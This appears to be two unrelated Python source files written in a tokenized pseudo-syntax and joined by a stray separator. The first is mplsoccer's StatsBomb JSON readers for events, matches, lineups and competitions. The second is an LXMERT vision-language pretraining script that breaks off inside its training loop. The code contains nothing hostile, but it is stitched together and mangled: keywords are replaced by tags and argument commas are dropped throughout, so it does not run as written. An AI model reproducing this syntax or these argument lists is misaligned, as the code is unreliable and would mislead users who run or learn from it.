Whether to return a ``tactics_lineup`` Dataframe in the returned dictionary.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
Dict of up to 4 pandas.DataFrame.
Dict keys: ``event``, ``related_event``, ``shot_freeze_frame``, ``tactics_lineup``.
Examples
--------
>>> from mplsoccer.statsbomb import read_event
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','events','7430.json')
>>> dict_dfs = read_event(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_event, EVENT_SLUG
>>> URL = f'{EVENT_SLUG}/7430.json'
>>> dict_dfs = read_event(URL)
"""<if_stmt>warn<block_start>warnings.warn(STATSBOMB_WARNING)<block_end>df_dict={}<line_sep># read as dataframe
<if_stmt>type(path_or_buf).__name__<eq>'Response'<block_start>df=pd.read_json(path_or_buf.content encoding='utf-8')<line_sep>match_id=int(path_or_buf.url.split('/')[-1].split('.')[0])<block_end><else_stmt><block_start>df=pd.read_json(path_or_buf encoding='utf-8')<line_sep>match_id=int(os.path.basename(path_or_buf)[:-5])<block_end><if_stmt>df.empty<block_start>print(f'Skipping {path_or_buf}: empty json')<line_sep><return><none><block_end># timestamp defaults to today's date so store as integers in seperate columns
df['timestamp_minute']=df.timestamp.dt.minute<line_sep>df['timestamp_second']=df.timestamp.dt.second<line_sep>df['timestamp_millisecond']=(df.timestamp.dt.microsecond/1000).astype(np.int64)<line_sep>df.drop('timestamp' axis=1 inplace=<true>)<line_sep># get match id and add to the event dataframe
df['match_id']=match_id<line_sep># loop through the columns that are still dictionary columns
# and add them as separate cols to the dataframe
# these are nested dataframes in the docs - although dribbled_past/ pressure isn't needed here?
# also some others are needed: type, possession_team, play_pattern,
# team, tactics, player, position
dictionary_columns=['pass' '50_50' 'bad_behaviour' 'ball_receipt' 'ball_recovery' 'block' 'carry' 'clearance' 'dribble' 'duel' 'foul_committed' 'foul_won' 'goalkeeper' 'half_end' 'half_start' 'injury_stoppage' 'interception' 'miscontrol' 'play_pattern' 'player' 'player_off' 'position' 'possession_team' 'shot' 'substitution' 'tactics' 'team' 'type']<for_stmt>col dictionary_columns<block_start><if_stmt>col<in>df.columns<block_start>df=_split_dict_col(df col)<block_end><block_end># sort by time and reset index
df.sort_values(['minute' 'second' 'timestamp_minute' 'timestamp_second' 'timestamp_millisecond' 'possession'] inplace=<true>)<line_sep>df.reset_index(inplace=<true> drop=<true>)<line_sep># split location info to x, y and (z for shot) columns and drop old columns
_split_location_cols(df 'location' ['x' 'y' 'z'])<line_sep>_split_location_cols(df 'pass_end_location' ['pass_end_x' 'pass_end_y'])<line_sep>_split_location_cols(df 'carry_end_location' ['carry_end_x' 'carry_end_y'])<line_sep>_split_location_cols(df 'shot_end_location' ['shot_end_x' 'shot_end_y' 'shot_end_z'])<line_sep>_split_location_cols(df 'goalkeeper_end_location' ['goalkeeper_end_x' 'goalkeeper_end_y'])<line_sep># replace weird * character in the type_name for ball receipt
df['type_name']=df['type_name'].replace({'Ball Receipt*':'Ball Receipt'})<line_sep># because some columns were contained in dictionaries they have been split into separate columns
# with different prefixes, e.g. clearance_aerial_won, pass_aerial_won, shot_aerial_won
# this combines them into one column and drops the original columns
df=_simplify_cols_and_drop(df 'outcome_id')<line_sep>df=_simplify_cols_and_drop(df 'outcome_name')<line_sep>df=_simplify_cols_and_drop(df 'body_part_id')<line_sep>df=_simplify_cols_and_drop(df 'body_part_name')<line_sep>df=_simplify_cols_and_drop(df 'aerial_won')<line_sep>df=_simplify_cols_and_drop(df 'end_x' ['pass_end_x' 'carry_end_x' 'shot_end_x' 'goalkeeper_end_x'])<line_sep>df=_simplify_cols_and_drop(df 'end_y' ['pass_end_y' 'carry_end_y' 'shot_end_y' 'goalkeeper_end_y'])<line_sep>df=_simplify_cols_and_drop(df 'sub_type_id' ['pass_type_id' 'duel_type_id' 'goalkeeper_type_id' 'shot_type_id'])<line_sep>df=_simplify_cols_and_drop(df 'sub_type_name' ['pass_type_name' 'duel_type_name' 'goalkeeper_type_name' 'shot_type_name'])<line_sep># technique id/names are not always present so have to take this into account
technique_id_cols=['pass_technique_id' 'goalkeeper_technique_id' 'shot_technique_id']<line_sep>technique_id_cols=set(technique_id_cols).intersection(set(df.columns))<line_sep>technique_name_cols=['pass_technique_name' 'goalkeeper_technique_name' 'shot_technique_name']<line_sep>technique_name_cols=set(technique_name_cols).intersection(set(df.columns))<line_sep>df=_simplify_cols_and_drop(df 'technique_id' technique_id_cols)<line_sep>df=_simplify_cols_and_drop(df 'technique_name' technique_name_cols)<line_sep># create a related events dataframe
<if_stmt>related_event_df<block_start>df_related_event=_list_dictionary_to_df(df col='related_events' value_name='related_event' var_name='event_related_id')<line_sep># some carries don't have the corresponding events.
# This makes sure all events are linked both ways
df_related_event.drop('event_related_id' axis=1 inplace=<true>)<line_sep>df_related_event_reverse=df_related_event.rename({'related_event':'id' 'id':'related_event'} axis=1)<line_sep>df_related_event=pd.concat([df_related_event df_related_event_reverse] sort=<false>)<line_sep>df_related_event.drop_duplicates(inplace=<true>)<line_sep># and add on the type_names, index for easier lookups of how the events are related
df_event_type=df[['id' 'type_name' 'index']].copy()<line_sep>df_related_event=df_related_event.merge(df_event_type on='id' how='left' validate='m:1')<line_sep>df_event_type.rename({'id':'related_event'} axis=1 inplace=<true>)<line_sep>df_related_event=df_related_event.merge(df_event_type on='related_event' how='left' validate='m:1' suffixes=['' '_related'])<line_sep>df_related_event.rename({'related_event':'id_related'} axis=1 inplace=<true>)<line_sep># add on match_id and add to dictionary
df_related_event['match_id']=match_id<line_sep>df_dict['related_event']=df_related_event<block_end># create a shot freeze frame dataframe - also splits dictionary of player details into columns
<if_stmt>shot_freeze_frame_df<block_start>df_shot_freeze=_list_dictionary_to_df(df col='shot_freeze_frame' value_name='player' var_name='event_freeze_id')<line_sep>df_shot_freeze=_split_dict_col(df_shot_freeze 'player')<line_sep>_split_location_cols(df_shot_freeze 'player_location' ['x' 'y'])<line_sep># add on match_id and add to dictionary
df_shot_freeze['match_id']=match_id<line_sep>df_dict['shot_freeze_frame']=df_shot_freeze<block_end># create a tactics lineup frame dataframe
# also splits dictionary of player details into columns
<if_stmt>tactics_lineup_df<block_start>df_tactic_lineup=_list_dictionary_to_df(df col='tactics_lineup' value_name='player' var_name='event_tactics_id')<line_sep>df_tactic_lineup=_split_dict_col(df_tactic_lineup 'player')<line_sep># add on match_id and add to dictionary
df_tactic_lineup['match_id']=match_id<line_sep>df_dict['tactics_lineup']=df_tactic_lineup<block_end># drop columns stored as a separate table
df.drop(['related_events' 'shot_freeze_frame' 'tactics_lineup'] axis=1 inplace=<true>)<line_sep># there are a few errors with through ball not always being marked in the technique name
<if_stmt>'pass_through_ball'<in>df.columns<block_start>df.loc[df.pass_through_ball.notnull() 'technique_name']='Through Ball'<block_end># drop cols that are covered by other columns
# (e.g. pass technique covers through, ball, inswinging etc.)
cols_to_drop=['pass_through_ball' 'pass_outswinging' 'pass_inswinging' 'clearance_head' 'clearance_left_foot' 'clearance_right_foot' 'pass_straight' 'clearance_other' 'goalkeeper_punched_out' 'goalkeeper_shot_saved_off_target' 'shot_saved_off_target' 'goalkeeper_shot_saved_to_post' 'shot_saved_to_post' 'goalkeeper_lost_out' 'goalkeeper_lost_in_play' 'goalkeeper_success_out' 'goalkeeper_success_in_play' 'goalkeeper_saved_to_post' 'shot_kick_off' 'goalkeeper_penalty_saved_to_post']<line_sep>df.drop(cols_to_drop axis=1 errors='ignore' inplace=<true>)<line_sep># rename end location
df.rename({'shot_end_z':'end_z'} axis=1 inplace=<true>)<line_sep># reorder columns so some of the most used ones are first
cols=['match_id' 'id' 'index' 'period' 'timestamp_minute' 'timestamp_second' 'timestamp_millisecond' 'minute' 'second' 'type_id' 'type_name' 'sub_type_id' 'sub_type_name' 'outcome_id' 'outcome_name' 'play_pattern_id' 'play_pattern_name' 'possession_team_id' 'possession' 'possession_team_name' 'team_id' 'team_name' 'player_id' 'player_name' 'position_id' 'position_name' 'duration' 'x' 'y' 'z' 'end_x' 'end_y' 'end_z' 'body_part_id' 'body_part_name' 'technique_id' 'technique_name']<line_sep>other_cols=df.columns[~df.columns.isin(cols)]<line_sep>cols.extend(other_cols)<line_sep>df=df[cols].copy()<line_sep># add to dictionary
df_dict['event']=df<line_sep><return>df_dict<block_end><def_stmt>read_match path_or_buf warn=<true><block_start>""" Extracts individual match json and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_match
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','matches','11','1.json')
>>> df_match = read_match(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_match, MATCH_SLUG
>>> URL = f'{MATCH_SLUG}/11/1.json'
>>> df_match = read_match(URL)
"""<if_stmt>warn<block_start>warnings.warn(STATSBOMB_WARNING)<block_end><if_stmt>type(path_or_buf).__name__<eq>'Response'<block_start>df_match=pd.read_json(path_or_buf.content convert_dates=['match_date' 'last_updated'])<block_end><else_stmt><block_start>df_match=pd.read_json(path_or_buf convert_dates=['match_date' 'last_updated'])<block_end><if_stmt>df_match.empty<block_start>print(f'Skipping {path_or_buf}: empty json')<line_sep><return><none><block_end># loop through the columns that are still dictionary columns
# and add them as seperate cols to the datafram
dictionary_columns=['competition' 'season' 'home_team' 'away_team' 'metadata' 'competition_stage' 'stadium' 'referee']<for_stmt>col dictionary_columns<block_start><if_stmt>col<in>df_match.columns<block_start>df_match=_split_dict_col(df_match col)<block_end><block_end># convert kickoff to datetime - date + kickoff time
df_match['kick_off']=pd.to_datetime(df_match.match_date.astype(str)+' '+df_match.kick_off)<line_sep># drop one gender column as always equal to the other
# drop match status as always available
df_match.drop(['away_team_gender' 'match_status'] axis=1 inplace=<true>)<line_sep>df_match.rename({'home_team_gender':'competition_gender'} axis=1 inplace=<true>)<line_sep># manager is a list (len=1) containing a dictionary so lets split into columns
<if_stmt>'home_team_managers'<in>df_match.columns<block_start>df_match['home_team_managers']=df_match.home_team_managers.str[0]<line_sep>df_match=_split_dict_col(df_match 'home_team_managers')<line_sep>df_match['home_team_managers_dob']=pd.to_datetime(df_match['home_team_managers_dob'])<block_end><if_stmt>'away_team_managers'<in>df_match.columns<block_start>df_match['away_team_managers']=df_match.away_team_managers.str[0]<line_sep>df_match=_split_dict_col(df_match 'away_team_managers')<line_sep>df_match['away_team_managers_dob']=pd.to_datetime(df_match['away_team_managers_dob'])<block_end># ids to integers
<for_stmt>col ['competition_id' 'season_id' 'home_team_id' 'competition_stage_id']<block_start>df_match[col]=df_match[col].astype(np.int64)<block_end># sort and reset index: ready for exporting to feather
df_match.sort_values('kick_off' inplace=<true>)<line_sep>df_match.reset_index(inplace=<true> drop=<true>)<line_sep><return>df_match<block_end><def_stmt>read_competition path_or_buf warn=<true><block_start>""" Extracts competition json and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_competition
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','competitions.json')
>>> df_competition = read_competition(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_competition, COMPETITION_URL
>>> df_competition = read_competition(COMPETITION_URL)
"""<if_stmt>warn<block_start>warnings.warn(STATSBOMB_WARNING)<block_end><if_stmt>type(path_or_buf).__name__<eq>'Response'<block_start>df_competition=pd.read_json(path_or_buf.content convert_dates=['match_updated' 'match_available'])<block_end><else_stmt><block_start>df_competition=pd.read_json(path_or_buf convert_dates=['match_updated' 'match_available'])<block_end><if_stmt>df_competition.empty<block_start>print(f'Skipping {path_or_buf}: empty json')<line_sep><return><none><block_end>df_competition.sort_values(['competition_id' 'season_id'] inplace=<true>)<line_sep>df_competition.reset_index(drop=<true> inplace=<true>)<line_sep><return>df_competition<block_end><def_stmt>read_lineup path_or_buf warn=<true><block_start>""" Extracts individual lineup jsons and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_lineup
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','lineups','7430.json')
>>> df_lineup = read_lineup(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_lineup, LINEUP_SLUG
>>> URL = f'{LINEUP_SLUG}/7430.json'
>>> df_lineup = read_lineup(URL)
"""<if_stmt>warn<block_start>warnings.warn(STATSBOMB_WARNING)<block_end><if_stmt>type(path_or_buf).__name__<eq>'Response'<block_start>df_lineup=pd.read_json(path_or_buf.content encoding='utf-8')<line_sep>match_id=int(path_or_buf.url.split('/')[-1].split('.')[0])<block_end><else_stmt><block_start>df_lineup=pd.read_json(path_or_buf encoding='utf-8')<line_sep>match_id=os.path.basename(path_or_buf[:-5])<block_end><if_stmt>df_lineup.empty<block_start>print(f'Skipping {path_or_buf}: empty json')<line_sep><return><none><block_end>df_lineup['match_id']=match_id<line_sep># each line has a column named player that contains a list of dictionaries
# we split into seperate columns and then create a new row for each player using melt
df_lineup_players=df_lineup.lineup.apply(pd.Series)<line_sep>df_lineup=df_lineup.merge(df_lineup_players left_index=<true> right_index=<true>)<line_sep>df_lineup.drop('lineup' axis=1 inplace=<true>)<line_sep>df_lineup=df_lineup.melt(id_vars=['team_id' 'team_name' 'match_id'] value_name='player')<line_sep>df_lineup.drop('variable' axis=1 inplace=<true>)<line_sep>df_lineup=df_lineup[df_lineup.player.notnull()].copy()<line_sep>df_lineup=_split_dict_col(df_lineup 'player')<line_sep># turn ids to integers if no missings
df_lineup['match_id']=df_lineup.match_id.astype(np.int64)<line_sep>df_lineup['player_id']=df_lineup.player_id.astype(np.int64)<line_sep># sort and reset index: ready for exporting to feather
df_lineup.sort_values('player_id' inplace=<true>)<line_sep>df_lineup.reset_index(inplace=<true> drop=<true>)<line_sep><return>df_lineup<block_end><def_stmt>_get_links url# imports here as don't expect these functions to be used all the time
<block_start><import_from_stmt>bs4 BeautifulSoup<import_stmt>urllib.request<line_sep>response=urllib.request.urlopen(url)<line_sep>soup=BeautifulSoup(response 'html.parser' from_encoding=response.info().get_param('charset'))<line_sep>links=soup.find_all('a' href=<true>)<line_sep><return>links<block_end><def_stmt>get_match_links <block_start>""" Returns a list of links to the StatsBomb open-data match jsons."""<line_sep>match_url='https://github.com/statsbomb/open-data/tree/master/data/matches'<line_sep>match_folders=_get_links(match_url)<line_sep>match_folders=[(f'https://github.com/{link["href"]}' link['title'])<for>link match_folders<if>'/tree/master/data/matches'<in>link['href']]<line_sep>match_files=[]<for_stmt>link,folder match_folders<block_start>json_links=_get_links(link)<line_sep>json_links=[f'{MATCH_SLUG}/{folder}/{link["title"]}'<for>link json_links<if>link['href'][-4:]<eq>'json']<line_sep>match_files.extend(json_links)<block_end><return>match_files<block_end><def_stmt>get_event_links <block_start>""" Returns a list of links to the StatsBomb open-data event jsons."""<line_sep>url='https://github.com/statsbomb/open-data/tree/master/data/events'<line_sep>links=_get_links(url)<line_sep>links=[f'{EVENT_SLUG}/{link["title"]}'<for>link links<if>link['href'][-4:]<eq>'json']<line_sep><return>links<block_end><def_stmt>get_lineup_links <block_start>""" Returns a list of links to the StatsBomb open-data lineup jsons."""<line_sep>url='https://github.com/statsbomb/open-data/tree/master/data/lineups'<line_sep>links=_get_links(url)<line_sep>event_files=[f'{LINEUP_SLUG}/{link["title"]}'<for>link links<if>link['href'][-4:]<eq>'json']<line_sep><return>event_files<block_end> |
# coding=utf-8
# Copyleft 2019 project LXRT.
<import_stmt>collections<import_stmt>os<import_stmt>random<import_from_stmt>tqdm tqdm<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>torch.utils.data DataLoader<import_from_stmt>param args<import_from_stmt>pretrain.lxmert_data InputExample LXMERTDataset LXMERTTorchDataset LXMERTEvaluator<import_from_stmt>lxrt.entry set_visual_config<import_from_stmt>lxrt.tokenization BertTokenizer<import_from_stmt>lxrt.modeling LXRTPretraining<import_stmt>torch.distributed<as>dist<import_from_stmt>torch.utils.data.distributed DistributedSampler<import_stmt>torch.distributed<as>dist<import_from_stmt>src.tasks.vision_helpers GroupedBatchSampler create_aspect_ratio_groups_cache<import_from_stmt>lxrt.visual_transformers adjust_learning_rate<import_from_stmt>src.tools.load_stagte_dict load_state_dict_flexible_with_fp16 load_state_dict_flexible<import_stmt>gc<try_stmt><block_start><import_from_stmt>apex amp<block_end><except_stmt>ImportError<block_start><raise>ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")<block_end>DataTuple=collections.namedtuple("DataTuple" 'dataset torchdset loader evaluator')<if_stmt>args.distributed<block_start>dist.init_process_group(backend='nccl')<line_sep>torch.cuda.set_device(args.local_rank)<line_sep>args.gpus=torch.cuda.device_count()<line_sep>args.world_size=args.gpus<times>args.nodes<block_end>args.gpus=torch.cuda.device_count()<line_sep>args.gpu=args.local_rank<if>args.local_rank<ne>-1<else>0<line_sep>args.device=torch.device("cuda" args.gpu)<def_stmt>get_tuple splits:str bs:int shuffle=<false> drop_last=<false> topk=-1 distributed=<false> aspect_ratio_group_factor=-1<arrow>DataTuple# Decide which QA datasets would be used in pre-training.
# Options: vqa, gqa, visual7w
# Note: visual7w is a part of vgqa, we take the name here.
<block_start>qa_sets=args.qa_sets<if_stmt>qa_sets<is><not><none><block_start>qa_sets=set(qa_set.lower().strip()<for>qa_set qa_sets.split(","))<block_end># Build dataset, data loader, and evaluator.
dset=LXMERTDataset(splits qa_sets=qa_sets)<line_sep>tset=LXMERTTorchDataset(dset topk)<if_stmt>distributed<block_start>train_sampler=DistributedSampler(tset num_replicas=args.world_size rank=args.local_rank shuffle=shuffle )<block_end><else_stmt><block_start>train_sampler=torch.utils.data.RandomSampler(tset)<if_stmt><not>shuffle<block_start>train_sampler=torch.utils.data.SequentialSampler(tset)<block_end><block_end><if_stmt>aspect_ratio_group_factor<ge>0<block_start>group_ids=create_aspect_ratio_groups_cache(tset k=args.aspect_ratio_group_factor)<line_sep>train_batch_sampler=GroupedBatchSampler(train_sampler group_ids bs)<block_end><else_stmt><block_start>train_batch_sampler=torch.utils.data.BatchSampler(train_sampler bs drop_last=<true>)<block_end>data_loader=DataLoader(tset batch_sampler=train_batch_sampler num_workers=args.num_workers collate_fn=tset.collate_fn pin_memory=<true>)<line_sep>evaluator=LXMERTEvaluator(dset)<line_sep>print()<line_sep><return>DataTuple(dataset=dset torchdset=tset loader=data_loader evaluator=evaluator)<block_end>train_tuple=get_tuple(args.train args.batch_size shuffle=<true> drop_last=<true> distributed=args.distributed aspect_ratio_group_factor=args.aspect_ratio_group_factor)<line_sep>valid_batch_size=16<if>args.multiGPU<else>16<line_sep>valid_tuple=get_tuple(args.valid valid_batch_size shuffle=<false> drop_last=<false> topk=5000)<line_sep>LOSSES_NAME=('Mask_LM' 'Matched' 'Obj' 'Attr' 'Feat' 'QA')<def_stmt>to_gpu tensor device=<none><block_start><if_stmt>tensor<is><not><none><and>isinstance(tensor torch.Tensor)<block_start><if_stmt>device<is><not><none><block_start><return>tensor.to(device)<block_end><else_stmt><block_start><return>tensor.cuda()<block_end><block_end><return>tensor<block_end><class_stmt>LXMERT<block_start><def_stmt>__init__ self max_seq_length<block_start>super().__init__()<line_sep>self.max_seq_length=max_seq_length<line_sep>self.tokenizer=BertTokenizer.from_pretrained("bert-base-uncased" 
do_lower_case=<true>)<line_sep># Build model
set_visual_config(args)<line_sep>self.model=LXRTPretraining.from_pretrained("bert-base-uncased" task_mask_lm=args.task_mask_lm task_obj_predict=args.task_obj_predict task_matched=args.task_matched task_qa=args.task_qa visual_losses=args.visual_losses num_answers=train_tuple.dataset.answer_table.num_answers)<line_sep># Weight initialization and loading
<if_stmt>args.from_scratch<block_start>print("Train from Scratch: re-initialize all BERT weights.")<line_sep>self.model.apply(self.model.init_bert_weights)<block_end><if_stmt>args.load_lxmert<is><not><none># Load lxmert would not load the answer head.
<block_start>self.load_lxmert(args.load_lxmert)<block_end>#print(list(state_dict))
self.model=self.model.to(args.device)<if_stmt>args.distributed<block_start>no_decay=["bias" "LayerNorm.weight"]<line_sep>optimizer_grouped_parameters=[{"params":[p<for>n,p self.model.named_parameters()<if><not>any(nd<in>n<for>nd no_decay)] "weight_decay":args.weight_decay } {"params":[p<for>n,p self.model.named_parameters()<if>any(nd<in>n<for>nd no_decay)] "weight_decay":0.0 } ]<import_from_stmt>transformers AdamW get_linear_schedule_with_warmup<if_stmt>args.use_separate_optimizer_for_visual<block_start><import_from_stmt>lxrt.visual_transformers FusedOptimizer<line_sep>optimizer_grouped_parameters=[{"params":[p<for>n,p self.model.named_parameters()<if>((<not>any(nd<in>n<for>nd no_decay))<and>("visual_model"<not><in>n))] "weight_decay":args.weight_decay } {"params":[p<for>n,p self.model.named_parameters()<if>((any(nd<in>n<for>nd no_decay))<and>("visual_model"<not><in>n))] "weight_decay":0.0 } ]<line_sep>optim=AdamW(optimizer_grouped_parameters lr=args.lr #betas=(0.9, 0.98),
eps=args.adam_epsilon)<line_sep>#sgd_parameters = self.model.bert.encoder.visual_model.parameters()
<if_stmt>args.use_adam_for_visual<block_start>optimizer_grouped_parameters=[{"params":[p<for>n,p self.model.bert.encoder.visual_model.named_parameters()<if>((<not>any(nd<in>n<for>nd no_decay))<and>("visual_model"<not><in>n))] "weight_decay":args.weight_decay } {"params":[p<for>n,p self.model.bert.encoder.visual_model.named_parameters()<if>((any(nd<in>n<for>nd no_decay))<and>("visual_model"<not><in>n))] "weight_decay":0.0 } ]<line_sep>sgd=AdamW(optimizer_grouped_parameters lr=args.sgd_lr #betas=(0.9, 0.98),
eps=args.adam_epsilon)<block_end><else_stmt><block_start>sgd=torch.optim.SGD(self.model.bert.encoder.visual_model.parameters() args.sgd_lr momentum=args.sgd_momentum weight_decay=args.sgd_weight_decay)<block_end>self.optim=FusedOptimizer([optim sgd])<line_sep>batch_per_epoch=len(train_tuple.loader)<line_sep>t_total=int(batch_per_epoch<times>args.epochs)<floordiv>args.gradient_accumulation_steps<line_sep>self.scheduler=get_linear_schedule_with_warmup(optim num_warmup_steps=args.warmup_ratio<times>t_total num_training_steps=t_total)<block_end><else_stmt><block_start>self.optim=AdamW(optimizer_grouped_parameters lr=args.lr #betas=(0.9, 0.98),
eps=args.adam_epsilon)<line_sep>batch_per_epoch=len(train_tuple.loader)<line_sep>t_total=int(batch_per_epoch<times>args.epochs)<floordiv>args.gradient_accumulation_steps<line_sep>self.scheduler=get_linear_schedule_with_warmup(self.optim num_warmup_steps=args.warmup_ratio<times>t_total num_training_steps=t_total)<block_end><if_stmt>args.fp16<block_start><if_stmt>args.use_separate_optimizer_for_visual<block_start>self.model,[optim sgd]=amp.initialize(self.model self.optim.optimizers enabled=args.fp16 opt_level=args.fp16_opt_level)<line_sep>self.optim=FusedOptimizer([optim sgd])<block_end><else_stmt><block_start>self.model,self.optim=amp.initialize(self.model self.optim enabled=args.fp16 opt_level=args.fp16_opt_level)<block_end><import_from_stmt>apex.parallel DistributedDataParallel<as>DDP<line_sep>self.model=DDP(self.model)<block_end><else_stmt><block_start>self.model=torch.nn.parallel.DistributedDataParallel(self.model device_ids=[args.gpu] find_unused_parameters=<true>)<block_end><block_end><else_stmt># GPU Options
<block_start><if_stmt>args.multiGPU<block_start>self.model=nn.DataParallel(self.model)<block_end># Optimizer
<import_from_stmt>lxrt.optimization BertAdam<line_sep>batch_per_epoch=len(train_tuple.loader)<line_sep>t_total=int(batch_per_epoch<times>args.epochs)<line_sep>warmup_ratio=0.05<line_sep>warmup_iters=int(t_total<times>warmup_ratio)<line_sep>print("Batch per epoch: %d"%batch_per_epoch)<line_sep>print("Total Iters: %d"%t_total)<line_sep>print("Warm up Iters: %d"%warmup_iters)<line_sep>self.optim=BertAdam(self.model.parameters() lr=args.lr warmup=warmup_ratio t_total=t_total)<block_end><if_stmt>args.load<is><not><none><block_start>self.load(args.load)<line_sep>torch.cuda.empty_cache()<line_sep>gc.collect()<block_end><block_end><def_stmt>forward self examples<block_start>'''train_features = [convert_example_to_features(example, self.max_seq_length, self.tokenizer)
for example in examples]
# language Inputs
input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long).cuda()
input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long).cuda()
segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long).cuda()
# Visual Inputs
feats = torch.from_numpy(np.stack([f.visual_feats[0] for f in train_features])).cuda()
pos = torch.from_numpy(np.stack([f.visual_feats[1] for f in train_features])).cuda()
# Language Prediction
lm_labels = torch.tensor([f.lm_label_ids for f in train_features], dtype=torch.long).cuda()
# Visual Prediction
obj_labels = {}
for key in ('obj', 'attr', 'feat'):
visn_labels = torch.from_numpy(np.stack([f.obj_labels[key][0] for f in train_features])).cuda()
visn_mask = torch.from_numpy(np.stack([f.obj_labels[key][1] for f in train_features])).cuda()
assert visn_labels.size(0) == visn_mask.size(0) and visn_labels.size(1) == visn_mask.size(1)
obj_labels[key] = (visn_labels, visn_mask)
# Joint Prediction
matched_labels = torch.tensor([f.is_matched for f in train_features], dtype=torch.long).cuda()
ans = torch.from_numpy(np.stack([f.ans for f in train_features])).cuda() '''<line_sep>"""
forward(self, input_ids, token_type_ids=None, attention_mask=None, masked_lm_labels=None,
visual_feats=None, pos=None, obj_labels=None, matched_label=None, ans=None):
"""<line_sep>new_examples={}<for_stmt>key list(examples.keys())<block_start><if_stmt>key<ne>"uid"<block_start>new_examples[key]=to_gpu(examples[key])<block_end><block_end>loss,losses,ans_logit=self.model(**new_examples)<line_sep><return>loss losses.detach().cpu() ans_logit<block_end><def_stmt>valid_batch self batch<block_start><with_stmt>torch.no_grad()<block_start>loss,losses,ans_logit=self.forward(batch)<if_stmt>args.multiGPU<block_start>loss=loss.mean()<line_sep>losses=losses.mean(0)<block_end><block_end><return>loss.item() losses.cpu().numpy() ans_logit<block_end><def_stmt>train self train_tuple:DataTuple eval_tuple:DataTuple<block_start>train_ld=train_tuple.loader<line_sep># Train
best_eval_loss=9595.<for_stmt>epoch range(args.start_epoch args.epochs)# Train
<block_start>self.model.train()<line_sep>total_loss=0.<line_sep>total_losses=0.<line_sep>uid2ans={}<import_from_stmt>utils TrainingMeter<line_sep>train_meter=TrainingMeter()<if_stmt>args.use_separate_optimizer_for_visual<block_start>adjust_learning_rate(self.optim.optimizers[-1] epoch args)<block_end><for_stmt>i,batch enumerate(tqdm(train_ld total=len(train_ld)))<block_start><if_stmt>args.skip_training<and>i<eq>4<block_start><break><block_end>loss,losses,ans_logit=self.forward(batch)<if_stmt>args.multiGPU<block_start>loss=loss.mean()<block_end>losses=losses.squeeze(0)<if_stmt>args.gradient_accumulation_steps<g>1<block_start>loss=loss/args.gradient_accumulation_steps<block_end><if_stmt>args.fp16<block_start><if_stmt>args.use_separate_optimizer_for_visual<block_start><with_stmt>amp.scale_loss(loss self.optim.optimizers)<as>scaled_loss<block_start>scaled_loss.backward()<block_end><block_end><else_stmt><block_start><with_stmt>amp.scale_loss(loss self.optim)<as>scaled_loss<block_start>scaled_loss.backward()<block_end><block_end><block_end><else_stmt><block_start>loss.backward()<block_end><if_stmt>(i+1)%args.gradient_accumulation_steps<eq>0<block_start><if_stmt>args.fp16<block_start>total_norm=torch.nn.utils.clip_grad_norm_(amp.master_params(self.optim) args.max_grad_norm)<block_end><else_stmt><block_start>total_norm=torch.nn.utils.clip_grad_norm_(self.model.parameters() args.max_grad_norm)<block_end>self.optim.step()<if_stmt>args.distributed<block_start>self.scheduler.step()# Update learning rate schedule
<block_end>self.model.zero_grad()<line_sep>#self.optim.step()
<block_end>loss=loss.item()<line_sep>losses=losses.cpu().numpy()<line_sep>logit=ans_logit<line_sep>total_loss<augadd>loss<line_sep>total_losses<augadd>losses<if_stmt>args.task_qa<block_start>score,label=logit.max(1)<for_stmt>uid,l zip(batch["uid"] label.cpu().numpy())<block_start>ans=train_tuple.dataset.answer_table.id2ans(l)<line_sep>uid2ans[uid]=ans<block_end><block_end>train_meter.update({'totol_loss':loss<times>args.gradient_accumulation_steps "masked_lm":losses[0] "matched":losses[1] "qa_loss":losses[2]<if>len(losses)<eq>3<else>0.0 })<if_stmt>i<ne>0<and>i%args.report_step<eq>0<and>args.local_rank<le>0<block_start>print("Epoch {}, Training Step {} of {}".format(epoch i<floordiv>args.gradient_accumulation_steps len(train_ld)<floordiv>args.gradient_accumulation_steps))<line_sep>train_meter.report()<line_sep>train_meter.clean()<block_end><if_stmt>i<ne>0<and>args.save_step<ne>-1<and>(i<floordiv>args.gradient_accumulation_steps)%args.save_step<eq>0<and>args.local_rank<le>0<block_start>self.save("Epoch{}Step{}".format(epoch+1 i<floordiv>args.gradient_accumulation_steps))<block_end><block_end>#if args.task_qa:
# train_tuple.evaluator.evaluate(uid2ans, pprint=True)
# Save
<if_stmt>args.local_rank<le>0<block_start>self.save("Epoch%02d"%(epoch+1))<block_end># Eval
#avg_eval_loss = self.evaluate_epoch(eval_tuple, iters=-1)
